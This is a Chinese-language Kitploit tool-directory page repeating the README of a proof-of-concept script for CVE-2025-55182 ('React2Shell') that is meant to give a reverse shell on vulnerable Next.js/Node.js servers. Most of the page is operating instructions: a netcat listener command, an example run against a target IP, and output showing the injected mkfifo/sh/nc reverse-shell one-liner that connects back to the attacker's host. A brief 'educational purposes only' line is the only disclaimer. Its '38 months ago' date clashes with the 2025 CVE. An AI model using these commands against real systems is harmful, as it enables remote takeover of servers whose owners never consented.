Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
React2Shell-CVE-2025-55182-PoC-Reverse-Shell — 这是一个易于使用的PoC脚本,用于利用React2Shell-CVE-2025-55182 Nextjs漏洞。这将有助于获得一个反向shell。 | Kitploit
工具/GitHubGitHub/ihhgimhana/react2shell-cve-2025-55182-poc-reverse-shell
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHubihhgimhana/react2shell-cve-2025-55182-poc-reverse-shell

React2Shell-CVE-2025-55182-PoC-Reverse-Shell

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

这是一个易于使用的PoC脚本,用于利用React2Shell-CVE-2025-55182 Nextjs漏洞。这将有助于获得一个反向shell。

查看仓库
38个月前尚未审核

🚀 React2Shell - (CVE-2025–55182) 漏洞利用脚本

🔥 简介

此仓库包含一个针对 React2Shell 漏洞(CVE-2025–55182)的利用脚本,该漏洞针对一种特定的 Node.js 原型污染,可导致远程代码执行(RCE)。

该脚本专门设计用于通过向易受攻击的应用程序注入恶意载荷来建立 Netcat 反向 Shell 连接。


⚠️ 免责声明

此工具仅供教育和研究目的使用。


⚙️ 前置条件

  • Python 3.x
  • requests 库

安装

你可以使用 pip 安装所需的 Python 依赖项:

root@kitploit:~
pip install requests

🖥️ 使用方法

该脚本是一个用于获取反向 Shell 的专用工具,需要3个主要参数:目标URL(-u)、你的本地IP地址(-l)和监听端口(-p)。

1. 启动你的监听器

在运行利用脚本之前,你必须在本地机器上设置一个 Netcat 监听器,以捕获传入的反向 Shell 连接。

root@kitploit:~
# Start Netcat listener on port 9001 (or your custom port)
nc -lvnp 9001

2. 运行利用脚本

执行脚本,提供必需的参数。如果省略端口(-p),则默认为 9001。


使用示例

以 http://192.168.1.100:3000/ 为目标,并连接回你位于 192.168.1.5:4444 的监听器:

root@kitploit:~
python react2shell.py -u http://192.168.1.100:3000 -l 192.168.1.5 -p 4444

预期输出

该利用脚本在目标上使用 execSync 函数,该函数通常会阻塞服务器进程。因此,读取超时是命令成功执行的预期标志。

root@kitploit:~
### 🔥 React2Shell - (CVE-2025–55182)
### By Hasa

[*] Target URL (-u): [http://192.168.1.100:3000/](http://192.168.1.100:3000/)
[*] Local IP (-l): 192.168.1.5
[*] Port (-p): 4444
[*] Command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.1.5 4444 >/tmp/f
[*] Sending payload...
[+] [+] Attack may be Successful! Check your Netcat Listner.

如果成功,你将看到 Shell 连接到你的 Netcat 监听器。


🖼️ 帮助菜单

不带参数运行脚本会显示横幅和强制使用说明:

root@kitploit:~
python react2shell.py

输出:

root@kitploit:~
### 🔥 React2Shell - (CVE-2025–55182)
### By Hasa

usage: react2shell.py [-h] -u URL -l LOCAL_IP [-p PORT]

Educational Purposes Only!!!

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     (REQUIRED) The target URL (Ex: "[http://example.com:3000](http://example.com:3000)")
  -l LOCAL_IP, --local-ip LOCAL_IP
                        (REQUIRED) Listner or Attacker IP (Ex: "192.168.100.1")
  -p PORT, --port PORT  Listner Port (Default: 9001)

我的个人资料图片 我的个人资料图片

下载工具
标志参数描述示例
-u--url(必填) 易受攻击目标完整的URL。http://192.168.1.100:3000
-l--local-ip(必填) 你的攻击者/监听器IP地址。192.168.1.5
-p--port你的监听器正在运行的端口。4444